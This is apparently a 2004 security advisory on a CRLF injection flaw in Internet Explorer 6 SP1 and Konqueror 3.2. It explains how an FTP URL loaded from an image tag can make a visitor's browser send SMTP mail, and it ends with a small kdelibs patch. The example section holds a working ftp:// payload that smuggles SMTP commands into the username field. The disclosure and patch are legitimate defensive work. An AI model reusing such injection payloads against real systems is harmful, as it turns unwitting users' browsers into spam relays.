|
|
|
|
| |
| Both Internet Explorer and Konqueror can be tricked into sending mail through its FTP client without any more user interaction than loading a page. |
| |
Credit:
The information has been provided by Ian Gulliver.
|
| |
Vulnerable Systems:
* Internet Explorer version 6 SP1
* Konqueror version 3.2
Immune Systems:
* Mozilla Firefox version 1.0
Both Internet Explorer and Konqueror will accept %0a and %0d in URLs. In FTP URLs, it will accept them in the username part of the URL. Due to the similarity between the FTP and SMTP protocols, this can be used to send mail.
Danger:
Spammers could host websites that contain images causing website visitors to spam more people. There are probably other protocols that the FTP client could be used to maliciously access.
Example:
http://dsbl.org/testingground/IE-FTP-SMTP-link/
Which has an IMG link with the following URL:
ftp://foo%0d%0aHELO mail%0d%0aMAIL FROM%3a<>%0d%0aRCPT TO%3a<ian-example%40penguinhosting.net>%0d%0aDATA%0d%0aSubject%3a hacked%0d%0aTo%3a ian%40penguinhosting.net%0d%0a%0d%0ahacked%0d%0a.%0d%0a:bar@mx.penguinhosting.net:25
Unofficial patch for KDE:
--- kdelibs-3.2.3/kioslave/ftp/ftp.cc 2004-02-15 16:15:27.000000000 -0500
+++ kdelibs-3.2.3-ftp-fixed/kioslave/ftp/ftp.cc 2004-12-25 00:44:27.000000000 -0500
@@ -652,6 +652,9 @@
{
assert( sControl > 0 );
+ if (cmd.find('\r') != -1 || cmd.find('\n') != -1)
+ return false;
+
QCString buf = cmd;
buf += "\r\n";
|
|
|
|
|
|
|
|
|
|
